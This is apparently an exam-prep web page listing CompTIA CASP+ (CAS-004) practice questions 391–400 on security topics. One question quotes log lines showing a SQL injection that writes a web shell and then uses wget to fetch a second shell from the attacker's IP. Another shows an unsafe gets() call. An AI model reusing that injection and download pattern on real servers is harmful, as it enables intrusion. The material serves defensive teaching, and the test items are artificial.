1. Home
  2. CompTIA
  3. CAS-004

CompTIA CAS-004 Online Practice Questions and Exam Preparation

CAS-004 Exam Details

  • Exam Code
    :CAS-004
  • Exam Name
    :CompTIA Advanced Security Practitioner (CASP+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :792 Q&As
  • Last Updated
    :May 28, 2026

CompTIA CAS-004 Online Questions & Answers

  • Question 391:

    A retail organization wants to properly test and verify its capabilities to detect and/or prevent specific TTPs as mapped to the MITRE ATT&CK framework specific to APTs.

    Which of the following should be used by the organization to accomplish this goal?

    A. Tabletop exercise
    B. Penetration test
    C. Sandbox detonation
    D. Honeypot

  • Question 392:

    An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key. Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?

    A. Implement a VPN for all APIs.
    B. Sign the key with DSA.
    C. Deploy MFA for the service accounts.
    D. Utilize HMAC for the keys.

  • Question 393:

    A security team performed an external attack surface analysis and discovered the following issues on a group of application servers:

    1.The majority of the systems have end-of-life operating systems.

    2.The latest patches that are available are over two years old.

    3.The systems are considered mission critical for client support.

    4.The proprietary software running on the systems is not compatible with newer versions of the operating system.

    5.Server outages would negatively affect quarterly revenue projections.

    Which of the following would allow the security team to immediately mitigate the risks inherent to this situation?

    A. Implement a WAF between the application servers and the external perimeter.
    B. Contact the vendor for the proprietary software and negotiate a new maintenance contract.
    C. Document the application servers as being end of life and define a target date for decommission.
    D. Isolate the servers from the internet and configure an internal ACL, only allowing to authorized employees.

  • Question 394:

    An analyst discovers the following while reviewing some recent activity logs:

    76.235.14.101 - - [07/Mar/2019:16:05:32 -0800] "GET /login.php HTTP/1.1" 200

    76.235.14.101 - - [07/Mar/2019:16:05:42 -0800] "GET /mainmenu.php 200

    210.84.11.202 - - [07/Mar/2019:16:05:49 -0800] "GET /login.php?password=UNION SELECT '', INTO OUTFILE '/var/www/html/cmd.php'; HTTP/1.1" 200

    210.84.11.202 - - [07/Mar/2019:16:05:15 -0800] "GET /cmd.php?cmd=wget%20http://210.84.11.202/sh99.php HTTP/1.1" 200

    76.235.14.101 - - [07/Mar/2019:16:05:35 -0800] "GET /addtocart.php?itemid=352849 200

    210.84.11.202 - - [07/Mar/2019:16:05:36 -0800] "GET /sh99.php HTTP/1.1" 200

    76.235.14.101 - - [07/Mar/2019:16:07:00 -0800] "GET /checkout.php?itemid=352849 200

    Which of the following tools would MOST likely identify a future incident in a timely manner?

    A. DDoS protection
    B. File integrity monitoring
    C. SCAP scanner
    D. Protocol analyzer

  • Question 395:

    An organization handles sensitive information that must be displayed on call center technicians' screens to verify the identities of remote callers. The technicians use three randomly selected fields of information to complete the identity verification process. Some of the fields contain PII that are unique identifiers for the remote callers. Which of the following should be implemented to identify remote callers while also reducing the risk that technicians could improperly use the identification information?

    A. Data masking
    B. Encryption
    C. Tokenization
    D. Scrubbing
    E. Substitution

  • Question 396:

    Several unlabeled documents in a cloud document repository contain cardholder information.

    Which of the following configuration changes should be made to the DLP system to correctly label these documents in the future?

    A. Digital rights management
    B. Network traffic decryption
    C. Regular expressions
    D. Watermarking

  • Question 397:

    SIMULATION

    An IPSec solution is being deployed. The configuration files for both the VPN concentrator and the AAA server are shown in the diagram.

    Complete the configuration files to meet the following requirements:

    1. The EAP method must use mutual certificate-based authentication (with issued client certificates).

    2. The IKEv2 cipher suite must be configured to the MOST secure authenticated mode of operation.

    3. The secret must contain at least one uppercase character, one lowercase character, one numeric character, and one special character, and it must meet a minimum length requirement of eight characters.

    INSTRUCTIONS

    Click on the AAA server and VPN concentrator to complete the configuration. Fill in the appropriate fields and make selections from the drop-down menus.

    If at any time you would like to bung back the initial state of the simulation, please click the Reset All button.

    A. Check the answer in explanation below.
    B. PlaceHolder
    C. PlaceHolder
    D. PlaceHolder

  • Question 398:

    An accounting team member received a voicemail message from someone who sounded like the Chief Financial Officer (CFO). In the voicemail message, the caller requested a wire transfer to a bank account the organization had not used before. Which of the following best describes this type of attack?

    A. The attacker used deepfake technology to simulate the CFO's voice.
    B. The CFO tried to commit a form of embezzlement.
    C. The attacker used caller ID spoofing to imitate the CFO's internal phone extension.
    D. The attacker successfully phished someone in the accounts payable department.

  • Question 399:

    A security architect examines a section of code and discovers the following:

    1.char username[20]

    2.char password[20]

    3.gets(username)

    4.checkUserExists(username)

    Which of the following changes should the security architect require before approving the code for release?

    A. Allow only alphanumeric characters for the username.
    B. Make the password variable longer to support more secure passwords.
    C. Prevent more than 20 characters from being entered.
    D. Add a password parameter to the checkUserExists function.

  • Question 400:

    A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network:

    Which of the following is the BEST solution to ensure the administrator can complete the assigned task?

    A. A full-tunnel VPN
    B. Web content filtering
    C. An endpoint DLP solution
    D. SSL/TLS decryption

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-004 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.